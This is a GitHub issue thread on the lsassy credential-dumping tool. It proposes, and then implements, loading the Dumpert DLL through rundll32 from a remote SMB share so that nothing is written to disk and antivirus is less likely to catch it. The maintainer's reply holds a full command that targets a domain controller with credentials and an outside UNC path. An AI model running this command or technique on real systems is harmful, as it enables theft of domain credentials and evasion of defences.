[Feature] Optionally use UNC path with dumpertdll module to run dumpert DLL from SMB share
#61
Assignees
Labels
enhancement
New feature or request
Comments
|
That sounds very interesting. I'll sure have a look into it. |
|
Should be implemented in commit 82c519a (branch v3.0.1) For my tests, I hosted the DLL on a Windows machine with a share accessible to Authenticated Users, and it worked. :) lsassy -u Administrator -p "p4ssw0rd" -d hackn.lab dc01.hackn.lab -m dumpertdll -O dumpertdll_path='\\10.10.10.1\Tools\dumpert.dll' |
|
I'll close the issue, feel free to reopen it if this don't fit your needs |
|
Sorry about the delay, I was planning on testing it this evening. I'll get back to you, and thanks for the quick turnaround! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello! First I would like to say congratulations on the 3.0.0 release, the new improvements look awesome! I had an idea while reading some of the new dumping methods, specifically dumpertdll.
rundll32can run DLLs from SMB shares, they don't have to be on the disk. My idea was to run an SMB share (like withSambaorimpacket-smbshare, not lsassy) and then place the dumpert DLL file in that share. You could then provide the UNC path to the dumpert DLL in the "dumpertdll_path" option, and lsassy would tellrundll32to call the dumpert DLL from the SMB share, instead of having to upload it.I've had lots of luck with this method when trying to spawn
sliveragents using a DLL loaded from an SMB share, and it would also prevent the OPSEC hit of having to upload the file to disk. Finally, if something goes wrong during the dump (like AV gets wind of what your doing) there is no risk of the dumpert DLL persisting after aborted execution because it couldn't be deleted.The text was updated successfully, but these errors were encountered: